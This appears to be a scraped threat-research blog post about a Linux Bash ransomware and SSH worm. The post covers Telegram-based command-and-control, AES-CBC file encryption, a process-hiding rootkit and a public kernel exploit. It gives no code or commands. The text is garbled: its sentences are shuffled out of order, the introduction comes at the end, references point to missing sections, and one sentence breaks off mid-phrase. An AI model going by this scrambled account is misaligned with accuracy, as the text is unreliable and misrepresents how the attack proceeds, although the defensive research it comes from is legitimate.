Some functions are commented by the malware author, while some functions are not used (dead code) in some cases. We observed that this script is heavily under development, and various versions of this ransomware are all similar with only minor changes. It also uses Telegram’s API to send an infection status to the threat actor(s). The malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various directories. The ransomware is written in bash script and targets Red Hat/CentOS and Debian Linux distributions. ![]() Looking at various iterations of the ransomware in this section, we investigate the script called “supermicro_cr_third”, which seems like the latest version. ![]() In the previous section, we talked about the SSH worm script that received the credential configuration as a base64 parameter and used it against target systems to download and execute the ransomware. For example, binaryinject1.so is a modified version of a rootkit called “ libprocesshider” that hides a process under Linux using the ld preloader and “pwd.c” (“CVE-2017-1000253.c”), which is a publicly available exploit for CentOS 7 kernel versions 3.10.0-514.21.2.el7.x86_64 and 3.10.0-514.26.1.el7.x86_64. We’ve observed that some of these scripts are based on open-source code. The following is a list and overview of the hacking tools. The hack tools URL with the ransomware information was initially reported by Twitter user the next sections of this blog, we analyze the content of the “api_attack/” directory, which contains the Secure Shell (SSH) worm and ransomware script. We also found that most components of this attack have very low detection numbers in Virus Total. The worm and ransomware scripts also use the API of the messaging application Telegram for command-and-control (C&C) communication. Most components of this attack mainly target Red Hat and CentOS Linux distributions however, in some scripts Debian-based Linux distributions are included as well. Upon investigating, we found that the attack chain is fully implemented as a bash script, but it also seems that the scripts are still under development. ![]() A recently discovered Bash ransomware piqued our interest in multiple ways.
0 Comments
Leave a Reply. |